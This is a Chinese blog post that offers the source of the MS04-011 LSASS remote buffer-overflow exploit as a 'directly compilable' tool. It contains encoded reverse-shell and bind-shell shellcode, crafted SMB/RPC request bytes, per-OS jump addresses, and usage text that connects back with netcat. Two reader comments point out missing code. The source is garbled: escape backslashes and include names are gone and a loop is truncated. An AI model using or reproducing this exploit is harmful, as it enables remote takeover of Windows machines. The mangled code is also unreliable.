LSASS溢出原代码(可直接编译版本)

#include
#include
#pragma comment(lib, "ws2_32")
// reverse shellcode
unsigned char reverseshell[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99"
"x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12"
"x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99"
"x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9"
"xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D"
"x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA"
"xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32"
"x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10"
"xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8"
"xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66"
"xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5"
"x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8"
"x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A"
"x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12"
"x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A"
"x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C"
"x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33"
"xF9x7ExE0x5FxE0";
// bind shellcode
unsigned char bindshell[] =
"xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";

char req1[] =
"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"
"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"
"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"
"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"
"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"
"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"
"x20x4Cx4Dx20x30x2Ex31x32x00";
char req2[] =
"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"
"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"
"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"
"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"
"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"
"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"
"x2Ex00x30x00x00x00x00x00";

char req3[] =
"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"
"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"
"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"
"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"
"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"
"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"
"x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF"
"x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00"
"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"
"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"
"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"
"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";

char req4[] =
"x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00"
"x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00"
"x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00"
"x49x00x50x00x43x00x24"
"x00x00x00x3Fx3Fx3Fx3Fx3Fx00";
char req5[] =
"x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00"
"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00"
"x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00"
"x72x00x70x00x63x00x00x00";
char req6[] =
"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
"x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00"
"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
"x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11"
"x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A"
"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";
char req7[] =
"x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02"
"x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00"
"xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00"
"xECx03x00x00x00x00x00x00xECx03x00x00";
// room for shellcode here ...
char shit1[] =
"x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9";
char req8[] =
"x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE"
"x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF"
"xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00"
"x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00"
"x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00"
"x00x00x00x00xADx0Dx00x00";
// room for shellcode here ...
char req9[] =
"x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01"
"x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02"
"x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00"
"x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00";

char shit3[] =
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00";

#define LEN 3500
#define BUFSIZE 2000
#define NOP 0x90
struct targets {
int num;
char name[50];
long jmpaddr;
} ttarget[]= {
{ 0, "WinXP Professional [universal] lsass.exe ", 0x01004600 }, // jmp esp addr
{ 1, "Win2k Professional [universal] netrap.dll", 0x7515123c }, // jmp ebx addr
{ 2, "Win2k Advanced Server [SP4] netrap.dll", 0x751c123c }, // jmp ebx addr
//{ 3, "reboot", 0xffffffff }, // crash
{ NULL }
};
void usage(char *prog)
{
int i;
printf("MS04-011 LSASRV.DLL Remote Exploitn");
printf("Compiled by HBU-LK007 (LK007@163.com)n");
printf("Usage:nn");
printf("%s [connectback IP] [options]nn", prog);
printf("Targets:n");
for (i=0; i<3; i++)
printf(" %d [0x%.8x]: %sn", ttarget.num, ttarget.jmpaddr, ttarget.name);
printf("nOptions:n");
printf(" -t: Detect remote OS:n");
printf(" Windows 5.1 - WinXPn");
printf(" Windows 5.0 - Win2knn");
printf("Example:n");
printf("LSASS 0 192.168.1.10 4444 -tn");
printf("LSASS 0 192.168.1.10 4444n");
printf("nc 192.168.1.10 4444n");
exit(0);
}

int main(int argc, char *argv[])
{
int i;
int opt = 0;
char *target;
char hostipc[40];
char hostipc2[40*2];
unsigned short port;
unsigned long ip;
unsigned char *sc;
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(req4)+20];
char screq[BUFSIZE+sizeof(req7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="x66x81xECx1Cx07xFFxE4";
char strBuffer[BUFSIZE];
unsigned int targetnum = 0;
int len, sockfd;
short dport = 445;
struct hostent *he;
struct sockaddr_in their_addr;
char smblen;
char unclen;
WSADATA wsa;

printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n");
printf("--- Coded by .::[ houseofdabus ]::. ---nn");

if (argc 4)
if (!memcmp(argv[4], "-t", 2)) opt = 1;
if ( (argc > 4) && !opt ) {
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;
memcpy(&reverseshell[118], &port, 2);
memcpy(&reverseshell[111], &ip, 4);
sc = reverseshell;
} else {
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
sc = bindshell;
}

if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "x3cx12x15x75", 4);
memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);
memcpy(&buf[2036], sc, strlen(sc));
memcpy(&buf[2840], "xebx06xebx06", 4);
memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addr
memcpy(&buf[2856], sc, strlen(sc));
for (i=0; ih_addr);
memset(&(their_addr.sin_zero), '

LSASS溢出原代码(可直接编译版本)》有2个想法

  1. 你这个代码有一行少了点东西哦,能不能给个全的阿

  2. for (i=0; i
    sendbuf[i*2] = buf;
    sendbuf[i*2+1] = 0;
    }

    就这个地方,好像循环的条件没有写全哦

发表评论